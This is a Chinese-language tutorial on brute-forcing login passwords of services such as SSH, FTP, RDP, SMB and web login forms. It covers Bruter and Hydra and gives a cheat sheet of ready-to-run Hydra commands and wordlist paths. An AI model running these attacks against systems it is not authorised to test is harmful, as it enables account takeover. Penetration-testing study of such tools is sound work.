[TOC] ## CS架構暴力猜解 指軟件，數據庫，操作系統，3389相關的破解。C/S 即客戶端/服務器,基于 C/S 架構的應用程序 如 ssh ftpsql-server mysql 等， 這些服務往往提供一個高權限的用戶，使用這些高權限的用戶能在很大程度上給開發人員帶來方便，但如果口令被破解帶來的危害也是相當大的。 C/S 架構主要使用的破解工具 Hydra、Bruter、X-scan ### window下建議使用bruter 使用步驟： 1. 添加地址，選擇協議，端口 2. 添加用戶名 linux默認用戶名一般是root,windows是administrator 3. 選擇字典 注意不支持中文目錄 也可以不用字典，用自帶功能的字符組合方式 4. 開始 ### Linux下建議使用hydra 該軟件kali自帶，也可以自己下載安裝，注意hydra-gtk是有圖形化界面的，命令行或圖形化都可以 hydra 是著名黑客組織 thc 的一款開源的暴力密碼破解工具，可以在線破解多種密碼。官網：http://www.thc.org/thc-hydra kail 密碼字典 ``` /usr/share/wfuzz/wordlist/others/names.txt /usr/share/wfuzz/wordlist/others/common_pass.txt ``` #### hydra參數： ```sh hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 繼續從上一次進度接著破解。 -S 采用 SSL 鏈接。 -s PORT 可通過這個參數指定非默認端口。 -l LOGIN 指定破解的用戶名，對特定用戶破解。 -L FILE 指定用戶名字典。 -p PASS 小寫，指定密碼破解，少用，一般是采用密碼字典。 -P FILE 大寫，指定密碼字典。 -e ns 可選選項，n：空密碼試探，s：使用指定用戶和密碼試探。一般都是加上的 -C FILE 使用冒號分割格式，例如“登錄名:密碼”來代替-L/-P 參數。 -M FILE 指定目標列表文件一行一條。 -o FILE 指定結果輸出文件。 -f ，找到第一對登錄名或者密碼的時候中止破解。 -t TASKS 同時運行的線程數，默認為 16。 -w TIME 設置最大超時的時間，單位秒，默認是 30s。 server 目標 ip service 指定服務名，如telnet ftp pop3 smb smbnt mssql mysql snmp 等 ``` #### 使用舉例 破解ssh ```sh hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh #破解成功，直接顯示結果。也可以使用 -o 選項指定結果輸出文件。 hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh ``` 常規用法匯總 ```sh #1.破解 ssh： hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh #2.破解 ftp： hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認 16) -vV hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV #3.get方式提交，破解 web 登錄： hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/ hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php #4.post 方式提交，破解 web 登錄： hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login" （說明：http-post-form 表示破解是采用 http 的 post 方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。） #5.破解 https： hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https #6.破解 teamspeak： hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak #7.破解 cisco設備： hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable #8.破解 smb： hydra -l administrator -P pass.txt 10.36.16.18 smb #9.破解 pop3： hydra -l muts -P pass.txt my.pop3.mail pop3 #10.破解 rdp： hydra ip rdp -l administrator -P pass.txt -V #11.破解 http-proxy： hydra -l admin -P pass.txt http-proxy://10.36.16.18 #12.破解 imap： hydra -L user.txt -p secret 10.36.16.18 imap PLAIN ``` ## 暴力破解工具選擇 >對于爆破軟件的選擇，主要看速度，穩定性，支持的協議數 >這款暴力密碼破解工具相當強大，支持幾乎所有協議的在線密碼破解， >其密碼能否被破解關鍵在于字典是否足夠強大。